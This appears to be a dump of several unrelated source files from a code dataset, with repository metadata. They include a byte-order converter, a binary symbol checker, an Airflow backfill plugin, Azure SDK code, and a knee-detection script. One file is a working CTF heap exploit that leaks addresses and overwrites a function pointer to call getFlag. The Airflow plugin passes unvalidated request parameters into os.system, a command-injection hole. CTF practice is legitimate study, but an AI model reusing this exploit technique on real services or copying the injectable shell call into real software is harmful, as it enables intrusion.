] | null | null | null | udp-py/udp/ba/convert.py | moky/WormHole | 6b2b79274274f6764e0d519d384eb65489f4ca56 | [
"MIT"
] | 2 | 2020-09-11T05:29:11.000Z | 2022-03-13T15:45:22.000Z | # -*- coding: utf-8 -*-
#
# BA: Byte Array
#
# Written in 2020 by Moky <albert.moky@gmail.com>
#
# ==============================================================================
# MIT License
#
# Copyright (c) 2020 Albert Moky
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# ==============================================================================
from typing import Optional, Union
from .array import ByteArray, IntegerData, Endian
from .integer import UInt16Data, UInt32Data
class Convert:
"""
Network Byte Order Converter
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
"""
@classmethod
def int_from_data(cls, data: Union[bytes, bytearray, ByteArray], start: int, size: int) -> int:
return IntegerData.get_value(source=data, start=start, size=size, endian=Endian.BIG_ENDIAN)
@classmethod
def int16_from_data(cls, data: Union[bytes, bytearray, ByteArray], start: int = 0) -> int:
return cls.int_from_data(data=data, start=start, size=2)
@classmethod
def int32_from_data(cls, data: Union[bytes, bytearray, ByteArray], start: int = 0) -> int:
return cls.int_from_data(data=data, start=start, size=4)
#
# UInt16Data
#
@classmethod
def uint16data_from_value(cls, value: int) -> UInt16Data:
return UInt16Data.from_int(value=value, endian=Endian.BIG_ENDIAN)
@classmethod
def uint16data_from_data(cls, data: Union[bytes, bytearray, ByteArray], start: int = 0) -> Optional[UInt16Data]:
data = cut(data=data, start=start)
return UInt16Data.from_data(data=data, endian=Endian.BIG_ENDIAN)
#
# UInt32Data
#
@classmethod
def uint32data_from_value(cls, value: int) -> UInt32Data:
return UInt32Data.from_int(value=value, endian=Endian.BIG_ENDIAN)
@classmethod
def uint32data_from_data(cls, data: Union[bytes, bytearray, ByteArray], start: int = 0) -> Optional[UInt32Data]:
data = cut(data=data, start=start)
return UInt32Data.from_data(data=data, endian=Endian.BIG_ENDIAN)
def cut(data: Union[bytes, bytearray, ByteArray], start: int = 0) -> Union[bytes, bytearray, ByteArray]:
if start == 0:
return data
elif isinstance(data, ByteArray):
return data.slice(start=start)
else:
return data[start:]
| 37.58427 | 116 | 0.663677 |
ace074c8911b8a5f1ea42fe4351a4c7b752bba8a | 10,803 | py | Python | contrib/devtools/symbol-check.py | Saurabgami977/Matilda | 03372a57ca5d18228a48b6ec221fd2323ca58ceb | [
"MIT"
] | 1 | 2021-05-27T03:43:08.000Z | 2021-05-27T03:43:08.000Z | contrib/devtools/symbol-check.py | Saurabgami977/Matilda | 03372a57ca5d18228a48b6ec221fd2323ca58ceb | [
"MIT"
] | null | null | null | contrib/devtools/symbol-check.py | Saurabgami977/Matilda | 03372a57ca5d18228a48b6ec221fd2323ca58ceb | [
"MIT"
] | 1 | 2021-08-06T05:18:10.000Z | 2021-08-06T05:18:10.000Z | #!/usr/bin/env python3
# Copyright (c) 2014 Wladimir J. van der Laan
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
A script to check that the executables produced by gitian only contain
certain symbols and are only linked against allowed libraries.
Example usage:
find ../gitian-builder/build -type f -executable | xargs python3 contrib/devtools/symbol-check.py
'''
import subprocess
import re
import sys
import os
from typing import List, Optional, Tuple
# Debian 8 (Jessie) EOL: 2020. https://wiki.debian.org/DebianReleases#Production_Releases
#
# - g++ version 4.9.2 (https://packages.debian.org/search?suite=jessie&arch=any&searchon=names&keywords=g%2B%2B)
# - libc version 2.19 (https://packages.debian.org/search?suite=jessie&arch=any&searchon=names&keywords=libc6)
#
# Ubuntu 16.04 (Xenial) EOL: 2024. https://wiki.ubuntu.com/Releases
#
# - g++ version 5.3.1 (https://packages.ubuntu.com/search?keywords=g%2B%2B&searchon=names&suite=xenial§ion=all)
# - libc version 2.23.0 (https://packages.ubuntu.com/search?keywords=libc6&searchon=names&suite=xenial§ion=all)
#
# CentOS 7 EOL: 2024. https://wiki.centos.org/FAQ/General
#
# - g++ version 4.8.5 (http://mirror.centos.org/centos/7/os/x86_64/Packages/)
# - libc version 2.17 (http://mirror.centos.org/centos/7/os/x86_64/Packages/)
#
# Taking the minimum of these as our target.
#
# According to GNU ABI document (https://gcc.gnu.org/onlinedocs/libstdc++/manual/abi.html) this corresponds to:
# GCC 4.8.5: GCC_4.8.0
# (glibc) GLIBC_2_17
#
MAX_VERSIONS = {
'GCC': (4,8,0),
'GLIBC': (2,17),
'LIBATOMIC': (1,0)
}
# See here for a description of _IO_stdin_used:
# https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=634261#109
# Ignore symbols that are exported as part of every executable
IGNORE_EXPORTS = {
'_edata', '_end', '__end__', '_init', '__bss_start', '__bss_start__', '_bss_end__', '__bss_end__', '_fini', '_IO_stdin_used', 'stdin', 'stdout', 'stderr',
'environ', '_environ', '__environ',
}
READELF_CMD = os.getenv('READELF', '/usr/bin/readelf')
CPPFILT_CMD = os.getenv('CPPFILT', '/usr/bin/c++filt')
OBJDUMP_CMD = os.getenv('OBJDUMP', '/usr/bin/objdump')
OTOOL_CMD = os.getenv('OTOOL', '/usr/bin/otool')
# Allowed NEEDED libraries
ELF_ALLOWED_LIBRARIES = {
# matildad and matilda-qt
'libgcc_s.so.1', # GCC base support
'libc.so.6', # C library
'libpthread.so.0', # threading
'libm.so.6', # math library
'librt.so.1', # real-time (clock)
'libatomic.so.1',
'ld-linux-x86-64.so.2', # 64-bit dynamic linker
'ld-linux.so.2', # 32-bit dynamic linker
'ld-linux-aarch64.so.1', # 64-bit ARM dynamic linker
'ld-linux-armhf.so.3', # 32-bit ARM dynamic linker
'ld-linux-riscv64-lp64d.so.1', # 64-bit RISC-V dynamic linker
# matilda-qt only
'libxcb.so.1', # part of X11
'libfontconfig.so.1', # font support
'libfreetype.so.6', # font parsing
'libdl.so.2' # programming interface to dynamic linker
}
ARCH_MIN_GLIBC_VER = {
'80386': (2,1),
'X86-64': (2,2,5),
'ARM': (2,4),
'AArch64':(2,17),
'RISC-V': (2,27)
}
MACHO_ALLOWED_LIBRARIES = {
# matildad and matilda-qt
'libc++.1.dylib', # C++ Standard Library
'libSystem.B.dylib', # libc, libm, libpthread, libinfo
# matilda-qt only
'AppKit', # user interface
'ApplicationServices', # common application tasks.
'Carbon', # deprecated c back-compat API
'CoreFoundation', # low level func, data types
'CoreGraphics', # 2D rendering
'CoreServices', # operating system services
'CoreText', # interface for laying out text and handling fonts.
'Foundation', # base layer functionality for apps/frameworks
'ImageIO', # read and write image file formats.
'IOKit', # user-space access to hardware devices and drivers.
'libobjc.A.dylib', # Objective-C runtime library
}
PE_ALLOWED_LIBRARIES = {
'ADVAPI32.dll', # security & registry
'IPHLPAPI.DLL', # IP helper API
'KERNEL32.dll', # win32 base APIs
'msvcrt.dll', # C standard library for MSVC
'SHELL32.dll', # shell API
'USER32.dll', # user interface
'WS2_32.dll', # sockets
# matilda-qt only
'dwmapi.dll', # desktop window manager
'GDI32.dll', # graphics device interface
'IMM32.dll', # input method editor
'ole32.dll', # component object model
'OLEAUT32.dll', # OLE Automation API
'SHLWAPI.dll', # light weight shell API
'UxTheme.dll',
'VERSION.dll', # version checking
'WINMM.dll', # WinMM audio API
}
class CPPFilt(object):
'''
Demangle C++ symbol names.
Use a pipe to the 'c++filt' command.
'''
def __init__(self):
self.proc = subprocess.Popen(CPPFILT_CMD, stdin=subprocess.PIPE, stdout=subprocess.PIPE, universal_newlines=True)
def __call__(self, mangled):
self.proc.stdin.write(mangled + '\n')
self.proc.stdin.flush()
return self.proc.stdout.readline().rstrip()
def close(self):
self.proc.stdin.close()
self.proc.stdout.close()
self.proc.wait()
def read_symbols(executable, imports=True) -> List[Tuple[str, str, str]]:
'''
Parse an ELF executable and return a list of (symbol,version, arch) tuples
for dynamic, imported symbols.
'''
p = subprocess.Popen([READELF_CMD, '--dyn-syms', '-W', '-h', executable], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, universal_newlines=True)
(stdout, stderr) = p.communicate()
if p.returncode:
raise IOError('Could not read symbols for {}: {}'.format(executable, stderr.strip()))
syms = []
for line in stdout.splitlines():
line = line.split()
if 'Machine:' in line:
arch = line[-1]
if len(line)>7 and re.match('[0-9]+:$', line[0]):
(sym, _, version) = line[7].partition('@')
is_import = line[6] == 'UND'
if version.startswith('@'):
version = version[1:]
if is_import == imports:
syms.append((sym, version, arch))
return syms
def check_version(max_versions, version, arch) -> bool:
if '_' in version:
(lib, _, ver) = version.rpartition('_')
else:
lib = version
ver = '0'
ver = tuple([int(x) for x in ver.split('.')])
if not lib in max_versions:
return False
return ver <= max_versions[lib] or lib == 'GLIBC' and ver <= ARCH_MIN_GLIBC_VER[arch]
def elf_read_libraries(filename) -> List[str]:
p = subprocess.Popen([READELF_CMD, '-d', '-W', filename], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, universal_newlines=True)
(stdout, stderr) = p.communicate()
if p.returncode:
raise IOError('Error opening file')
libraries = []
for line in stdout.splitlines():
tokens = line.split()
if len(tokens)>2 and tokens[1] == '(NEEDED)':
match = re.match(r'^Shared library: \[(.*)\]$', ' '.join(tokens[2:]))
if match:
libraries.append(match.group(1))
else:
raise ValueError('Unparseable (NEEDED) specification')
return libraries
def check_imported_symbols(filename) -> bool:
cppfilt = CPPFilt()
ok = True
for sym, version, arch in read_symbols(filename, True):
if version and not check_version(MAX_VERSIONS, version, arch):
print('{}: symbol {} from unsupported version {}'.format(filename, cppfilt(sym), version))
ok = False
return ok
def check_exported_symbols(filename) -> bool:
cppfilt = CPPFilt()
ok = True
for sym,version,arch in read_symbols(filename, False):
if arch == 'RISC-V' or sym in IGNORE_EXPORTS:
continue
print('{}: export of symbol {} not allowed'.format(filename, cppfilt(sym)))
ok = False
return ok
def check_ELF_libraries(filename) -> bool:
ok = True
for library_name in elf_read_libraries(filename):
if library_name not in ELF_ALLOWED_LIBRARIES:
print('{}: NEEDED library {} is not allowed'.format(filename, library_name))
ok = False
return ok
def macho_read_libraries(filename) -> List[str]:
p = subprocess.Popen([OTOOL_CMD, '-L', filename], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, universal_newlines=True)
(stdout, stderr) = p.communicate()
if p.returncode:
raise IOError('Error opening file')
libraries = []
for line in stdout.splitlines():
tokens = line.split()
if len(tokens) == 1: # skip executable name
continue
libraries.append(tokens[0].split('/')[-1])
return libraries
def check_MACHO_libraries(filename) -> bool:
ok = True
for dylib in macho_read_libraries(filename):
if dylib not in MACHO_ALLOWED_LIBRARIES:
print('{} is not in ALLOWED_LIBRARIES!'.format(dylib))
ok = False
return ok
def pe_read_libraries(filename) -> List[str]:
p = subprocess.Popen([OBJDUMP_CMD, '-x', filename], stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, universal_newlines=True)
(stdout, stderr) = p.communicate()
if p.returncode:
raise IOError('Error opening file')
libraries = []
for line in stdout.splitlines():
if 'DLL Name:' in line:
tokens = line.split(': ')
libraries.append(tokens[1])
return libraries
def check_PE_libraries(filename) -> bool:
ok = True
for dylib in pe_read_libraries(filename):
if dylib not in PE_ALLOWED_LIBRARIES:
print('{} is not in ALLOWED_LIBRARIES!'.format(dylib))
ok = False
return ok
CHECKS = {
'ELF': [
('IMPORTED_SYMBOLS', check_imported_symbols),
('EXPORTED_SYMBOLS', check_exported_symbols),
('LIBRARY_DEPENDENCIES', check_ELF_libraries)
],
'MACHO': [
('DYNAMIC_LIBRARIES', check_MACHO_libraries)
],
'PE' : [
('DYNAMIC_LIBRARIES', check_PE_libraries)
]
}
def identify_executable(executable) -> Optional[str]:
with open(filename, 'rb') as f:
magic = f.read(4)
if magic.startswith(b'MZ'):
return 'PE'
elif magic.startswith(b'\x7fELF'):
return 'ELF'
elif magic.startswith(b'\xcf\xfa'):
return 'MACHO'
return None
if __name__ == '__main__':
retval = 0
for filename in sys.argv[1:]:
try:
etype = identify_executable(filename)
if etype is None:
print('{}: unknown format'.format(filename))
retval = 1
continue
failed = []
for (name, func) in CHECKS[etype]:
if not func(filename):
failed.append(name)
if failed:
print('{}: failed {}'.format(filename, ' '.join(failed)))
retval = 1
except IOError:
print('{}: cannot open'.format(filename))
retval = 1
sys.exit(retval)
| 35.188925 | 173 | 0.651763 |
ace075a261bf20d6efe7ca0ac79c88d05caa4aa2 | 4,709 | py | Python | plugins/backfill/main.py | leoCamilo/airflow-backfill-util | d1eb0c546894b5ea4f7cf1dfde366686cbd6d085 | [
"MIT"
] | null | null | null | plugins/backfill/main.py | leoCamilo/airflow-backfill-util | d1eb0c546894b5ea4f7cf1dfde366686cbd6d085 | [
"MIT"
] | null | null | null | plugins/backfill/main.py | leoCamilo/airflow-backfill-util | d1eb0c546894b5ea4f7cf1dfde366686cbd6d085 | [
"MIT"
] | 1 | 2019-11-13T06:14:59.000Z | 2019-11-13T06:14:59.000Z | # -*- coding: utf-8 -*-
# Inbuilt Imports
import os
import json
import logging
import datetime
import re
# Custom Imports
import flask
from flask import request
from flask_admin import BaseView, expose
from flask_appbuilder import expose as app_builder_expose, BaseView as AppBuilderBaseView,has_access
from airflow import configuration
from shelljob import proc
# Inspired from
# https://mortoray.com/2014/03/04/http-streaming-of-command-output-in-python-flask/
# https://www.endpoint.com/blog/2015/01/28/getting-realtime-output-using-python
# RBAC inspired from
# https://github.com/teamclairvoyant/airflow-rest-api-plugin
# Set your Airflow home path
airflow_home_path = os.environ['AIRFLOW_HOME']
# Local file where history will be stored
FILE = airflow_home_path + '/logs/backfill_history.txt'
rbac_authentication_enabled = configuration.getboolean("webserver", "RBAC")
# RE for remove ansi escape characters
ansi_escape = re.compile(r'\x1B[@-_][0-?]*[ -/]*[@-~]')
# Creating a flask admin BaseView
def file_ops(mode, data=None):
""" File operators - logging/writing and reading user request """
if mode == 'r':
try:
with open(FILE, 'r') as f:
return f.read()
except IOError:
with open(FILE, 'w') as f:
return f.close()
elif mode == 'w' and data:
today = datetime.datetime.now()
print(os.getcwd())
with open(FILE, 'a+') as f:
file_data = '{},{}\n'.format(data, today)
f.write(file_data)
return 1
def get_baseview():
if rbac_authentication_enabled == True:
return AppBuilderBaseView
else:
return BaseView
class Backfill(get_baseview()):
route_base = "/admin/backfill/"
if rbac_authentication_enabled == True:
@app_builder_expose('/')
def list(self):
""" Render the backfill page to client with RBAC"""
return self.render_template("backfill_page.html",
rbac_authentication_enabled=rbac_authentication_enabled)
else:
@expose('/')
def base(self):
""" Render the backfill page to client """
return self.render("backfill_page.html")
@expose('/stream')
@app_builder_expose('/stream')
def stream(self):
""" Runs user request and outputs console stream to client"""
dag_name = request.args.get("dag_name")
start_date = request.args.get("start_date")
end_date = request.args.get("end_date")
clear = request.args.get("clear")
if clear == 'true':
cmd = ['airflow', 'clear', '-c', str(dag_name), '-s', str(start_date), '-e', str(end_date)]
else:
cmd = ['airflow', 'backfill', str(dag_name), '-s', str(start_date), '-e', str(end_date), '-i']
print('BACKFILL CMD:', cmd)
# Update command used in history
file_ops('w', ' '.join(cmd))
g = proc.Group()
g.run(cmd)
def read_process():
while g.is_pending():
lines = g.readlines()
for proc, line in lines:
if not isinstance(line, str):
line = line.decode()
line = ansi_escape.sub('', line)
print('LINE===> {}'.format(line))
yield "data:" + line + "\n"
return flask.Response(read_process(), mimetype='text/event-stream')
@expose('/background')
@app_builder_expose('/background')
def background(self):
""" Runs user request in background """
dag_name = request.args.get("dag_name")
start_date = request.args.get("start_date")
end_date = request.args.get("end_date")
clear = request.args.get("clear")
# create a screen id based on timestamp
screen_id = datetime.datetime.now().strftime('%s')
if clear == 'true':
# Prepare the command and execute in background
background_cmd = f"screen -dmS {screen_id} airflow clear -c {dag_name} -s {start_date} -e {end_date}"
else:
background_cmd = f"screen -dmS {screen_id} airflow backfill {dag_name} -s {start_date} -e {end_date} -i"
# Update command in file
file_ops('w', background_cmd)
print(background_cmd)
os.system(background_cmd)
response = json.dumps({'submitted': True})
return flask.Response(response, mimetype='text/json')
@expose('/history')
@app_builder_expose('/history')
def history(self):
""" Outputs recent user request history """
return flask.Response(file_ops('r'), mimetype='text/txt')
| 32.253425 | 116 | 0.606286 |
ace07612a8e2abae39cc3a0d5ed373b746ded62c | 5,086 | py | Python | sponsor-challenges/csit/part2 source/heap2-exploit.py | wongwaituck/crossctf-2017-finals-public | bb180bcb3fdb559b7d7040fbe01c4fca98322f11 | [
"MIT"
] | 6 | 2017-06-26T15:07:19.000Z | 2018-10-09T20:03:27.000Z | sponsor-challenges/csit/part2 source/heap2-exploit.py | wongwaituck/crossctf-2017-finals-public | bb180bcb3fdb559b7d7040fbe01c4fca98322f11 | [
"MIT"
] | null | null | null | sponsor-challenges/csit/part2 source/heap2-exploit.py | wongwaituck/crossctf-2017-finals-public | bb180bcb3fdb559b7d7040fbe01c4fca98322f11 | [
"MIT"
] | 1 | 2018-08-18T00:49:02.000Z | 2018-08-18T00:49:02.000Z | #! /usr/bin/env python
import sys
from struct import pack
from optparse import OptionParser
from socket import *
import time
import subprocess
import shlex
import struct
def recv_timeout(the_socket, timeout=0.1):
the_socket.setblocking(0)
total_data=[];data='';begin=time.time()
while 1:
#if you got some data, then break after wait sec
if total_data and time.time()-begin>timeout:
break
#if you got no data at all, wait a little longer
elif time.time()-begin>timeout*2:
break
try:
data=the_socket.recv(8192)
if data:
total_data.append(data)
begin=time.time()
else:
time.sleep(0.1)
except:
pass
return ''.join(total_data)
def print_and_send(s, command):
s.send(command + "\n")
sys.stdout.write(command + "\n")
def exploit(hostname, port):
s = socket(AF_INET, SOCK_STREAM)
try:
print "[+] Connecting to %s on port %s" % (hostname, port)
s.connect((hostname, port))
except:
print "[+] Connection error"
sys.exit(1)
sys.stdout.write(recv_timeout(s))
print_and_send(s, "add " + "A"*8);
sys.stdout.write(recv_timeout(s))
print_and_send(s, "add " + "B"*8);
sys.stdout.write(recv_timeout(s))
# Insert a long one
print_and_send(s, "add " + "C"*16 + struct.pack("<I", 50));
sys.stdout.write(recv_timeout(s))
# Copy to overwrite the size of the second one
print_and_send(s, "copy 2 0");
sys.stdout.write(recv_timeout(s))
# Read to leak heap address
print_and_send(s, "show 1");
output = recv_timeout(s)
sys.stdout.write(output)
# The address of the third entry is here:
address_2 = struct.unpack("<I", output[20:24])[0]
print "[+] log_item[2] is found at", hex(address_2)
# Using gdb to find relative offsets of allocated memory,
# we know that ftable->fp is at address_2-96
address_ftable_fp_ptr = address_2 - 96
print "[+] ftable->fp is at", hex(address_ftable_fp_ptr)
address_0 = address_2 - 0x50
print "[+] log_item[0] is at", hex(address_0)
address_1 = address_2 - 0x50 + 32
print "[+] log_item[1] is at", hex(address_1)
# Insert a long one
# We insert 0x01010101 just because fgets stops at \0
print_and_send(s, "add "
+ "D"*16
+ struct.pack("<I", 0x01010101)
+ struct.pack("<I", address_ftable_fp_ptr))
sys.stdout.write(recv_timeout(s))
# Copy to overwrite the address of the second one
print_and_send(s, "copy 3 0");
sys.stdout.write(recv_timeout(s))
# Now we need to fix up the 0x01010101
# This part creates the string in memory
print_and_send(s, "add "
+ "E"*16
+ struct.pack("<I", 4))
sys.stdout.write(recv_timeout(s))
# Need to insert another string to overwrite the size of log_item[4]
print_and_send(s, "add "
+ "F"*8*4
+ struct.pack("<I", 5*4))
sys.stdout.write(recv_timeout(s))
# Copy to fix it up
print_and_send(s, "copy 5 3");
sys.stdout.write(recv_timeout(s))
print_and_send(s, "copy 4 0");
sys.stdout.write(recv_timeout(s))
# Read to leak address of print_log_item function in memory
print_and_send(s, "show 1");
output = recv_timeout(s)
sys.stdout.write(output)
address_print_log_item = struct.unpack("<I", output[0:4])[0]
print "[+] print_log_item is found at", hex(address_print_log_item)
# Get offset of debug from address of print_log_item
# $ objdump -D heap2 | grep print_log_item
# 00000cfe <print_log_item>:
# $ objdump -D heap2 | grep getFlag
# 00000d58 <getFlag>:
offset = 0x00000d58 - 0x00000cfe
address_debug = address_print_log_item + offset
# Overwrite function pointer on heap
print_and_send(s, "add "
+ "G"*16
+ struct.pack("<I", 0x01010101)
+ struct.pack("<I", address_ftable_fp_ptr))
sys.stdout.write(recv_timeout(s))
print_and_send(s, "copy 6 0");
sys.stdout.write(recv_timeout(s))
print_and_send(s, "add " + struct.pack("<I", address_debug))
sys.stdout.write(recv_timeout(s))
print_and_send(s, "copy 7 1");
sys.stdout.write(recv_timeout(s))
#raw_input()
# Trigger
print_and_send(s, "show 0");
sys.stdout.write("\n\n\nFlag is:")
sys.stdout.write(recv_timeout(s))
# Just to close the terminal nicely
sys.stdout.write("\n")
if __name__ == "__main__":
parser = OptionParser("usage: %prog [options]")
parser.add_option("-H", "--host", dest="hostname", default="127.0.0.1",
type="string", help="Target to run against")
parser.add_option("-p", "--port", dest="portnum", default=1234,
type="int", help="Target port")
(options, args) = parser.parse_args()
exploit(options.hostname, options.portnum)
| 29.74269 | 75 | 0.604797 |
ace078bce172e4965bcc14162faa59aac571b6b2 | 649 | py | Python | setup.py | enricobacis/until_nonidle | 59c267c143c8ab1b5b0814be2f5e03b54045f7ff | [
"MIT"
] | 1 | 2019-02-14T21:19:58.000Z | 2019-02-14T21:19:58.000Z | setup.py | enricobacis/until_nonidle | 59c267c143c8ab1b5b0814be2f5e03b54045f7ff | [
"MIT"
] | null | null | null | setup.py | enricobacis/until_nonidle | 59c267c143c8ab1b5b0814be2f5e03b54045f7ff | [
"MIT"
] | null | null | null | from setuptools import setup
with open('README.rst') as README:
long_description = README.read()
long_description = long_description[long_description.index('Description'):]
setup(
name='until_nonidle',
version='0.4',
description='Execute something as long as the user is idling.',
long_description=long_description,
install_requires=['psutil', 'xprintidle'],
url='http://github.com/enricobacis/until_nonidle',
author='Enrico Bacis',
author_email='enrico.bacis@gmail.com',
license='MIT',
packages=['until_nonidle'],
scripts=['scripts/until_nonidle'],
keywords='idle lock lockscreen action'
)
| 30.904762 | 79 | 0.713405 |
ace078e37d1bc11dd812e12ae6751e598990290f | 5,682 | py | Python | sdk/redhatopenshift/azure-mgmt-redhatopenshift/azure/mgmt/redhatopenshift/v2020_04_30/operations/_operations.py | vincenttran-msft/azure-sdk-for-python | 348b56f9f03eeb3f7b502eed51daf494ffff874d | [
"MIT"
] | 1 | 2022-02-01T18:50:12.000Z | 2022-02-01T18:50:12.000Z | sdk/redhatopenshift/azure-mgmt-redhatopenshift/azure/mgmt/redhatopenshift/v2020_04_30/operations/_operations.py | vincenttran-msft/azure-sdk-for-python | 348b56f9f03eeb3f7b502eed51daf494ffff874d | [
"MIT"
] | null | null | null | sdk/redhatopenshift/azure-mgmt-redhatopenshift/azure/mgmt/redhatopenshift/v2020_04_30/operations/_operations.py | vincenttran-msft/azure-sdk-for-python | 348b56f9f03eeb3f7b502eed51daf494ffff874d | [
"MIT"
] | null | null | null | # pylint: disable=too-many-lines
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import Any, Callable, Dict, Iterable, Optional, TypeVar
from msrest import Serializer
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpResponse
from azure.core.rest import HttpRequest
from azure.core.tracing.decorator import distributed_trace
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
from .._vendor import _convert_request
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
_SERIALIZER = Serializer()
_SERIALIZER.client_side_validation = False
def build_list_request(
**kwargs: Any
) -> HttpRequest:
api_version = kwargs.pop('api_version', "2020-04-30") # type: str
accept = "application/json"
# Construct URL
_url = kwargs.pop("template_url", "/providers/Microsoft.RedHatOpenShift/operations")
# Construct parameters
_query_parameters = kwargs.pop("params", {}) # type: Dict[str, Any]
_query_parameters['api-version'] = _SERIALIZER.query("api_version", api_version, 'str')
# Construct headers
_header_parameters = kwargs.pop("headers", {}) # type: Dict[str, Any]
_header_parameters['Accept'] = _SERIALIZER.header("accept", accept, 'str')
return HttpRequest(
method="GET",
url=_url,
params=_query_parameters,
headers=_header_parameters,
**kwargs
)
class Operations(object):
"""Operations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.redhatopenshift.v2020_04_30.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
@distributed_trace
def list(
self,
**kwargs: Any
) -> Iterable["_models.OperationList"]:
"""Lists all of the available RP operations.
The operation returns the RP operations.
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either OperationList or the result of cls(response)
:rtype:
~azure.core.paging.ItemPaged[~azure.mgmt.redhatopenshift.v2020_04_30.models.OperationList]
:raises: ~azure.core.exceptions.HttpResponseError
"""
api_version = kwargs.pop('api_version', "2020-04-30") # type: str
cls = kwargs.pop('cls', None) # type: ClsType["_models.OperationList"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
def prepare_request(next_link=None):
if not next_link:
request = build_list_request(
api_version=api_version,
template_url=self.list.metadata['url'],
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
else:
request = build_list_request(
api_version=api_version,
template_url=next_link,
)
request = _convert_request(request)
request.url = self._client.format_url(request.url)
request.method = "GET"
return request
def extract_data(pipeline_response):
deserialized = self._deserialize("OperationList", pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run( # pylint: disable=protected-access
request,
stream=False,
**kwargs
)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': "/providers/Microsoft.RedHatOpenShift/operations"} # type: ignore
| 38.653061 | 133 | 0.649595 |
ace07c413ecf348fe138592e0de18b09d7cad591 | 1,953 | py | Python | DetJoint/preprocess/extract_yolo_det.py | Tommy-Ngx/AutoGradingOA | 5e69bd38abaf01f03d8d837da68701a86bac1bb0 | [
"MIT"
] | 14 | 2019-10-29T10:48:43.000Z | 2022-03-16T08:35:40.000Z | DetJoint/preprocess/extract_yolo_det.py | Tommy-Ngx/AutoGradingOA | 5e69bd38abaf01f03d8d837da68701a86bac1bb0 | [
"MIT"
] | 4 | 2020-03-06T14:49:59.000Z | 2021-11-11T07:48:36.000Z | DetJoint/preprocess/extract_yolo_det.py | Tommy-Ngx/AutoGradingOA | 5e69bd38abaf01f03d8d837da68701a86bac1bb0 | [
"MIT"
] | 8 | 2019-09-19T04:59:04.000Z | 2022-01-31T12:03:46.000Z | # -*- coding: utf-8 -*-
import os, sys, pdb
import deepdish as dd
import glob
from skimage import io
import scipy.misc as misc
# def expand_bbox()
def extract_detected_knees(data_dir, det_dir, results_dir, expand=0.3):
img_list = glob.glob(os.path.join(data_dir, "*.png"))
for cur_img in img_list:
full_name = os.path.basename(cur_img)
cur_name = os.path.splitext(full_name)[0]
h5_path = os.path.join(det_dir, cur_name+".h5")
det_dict = dd.io.load(h5_path)
img = misc.imread(cur_img)
classes = det_dict["classes"]
coors = det_dict["coors"]
ind = 0
for label, coor in zip(classes, coors):
ind += 1
# thumb = img[coor[1]:coor[3], coor[0]:coor[2]]
x_len = coor[2] - coor[0]
x_len_expand = x_len * (1 + expand)
x_mid = (coor[2] + coor[0]) / 2
x_start = int(x_mid - x_len_expand / 2.0)
x_end = int(x_mid + x_len_expand / 2.0)
x_start = 0 if x_start < 0 else x_start
x_end = 2560 if x_end > 2560 else x_end
y_len = coor[3] - coor[1]
y_len_expand = y_len * (1 + expand)
y_mid = (coor[3] + coor[1]) / 2
y_start = int(y_mid - y_len_expand / 2.0)
y_end = int(y_mid + y_len_expand / 2.0)
y_start = 0 if y_start < 0 else y_start
y_end = 2048 if y_end > 2048 else y_end
thumb = img[y_start:y_end, x_start:x_end]
thumb = misc.imresize(thumb, (299, 299))
save_path = os.path.join(results_dir, str(label), cur_name + '_' + str(ind) + '.png')
misc.imsave(save_path, thumb)
if __name__ == "__main__":
raw_img_dir = "../../data/DetKneeData/test"
det_result_dir = "../../data/DetKneeData/det_results"
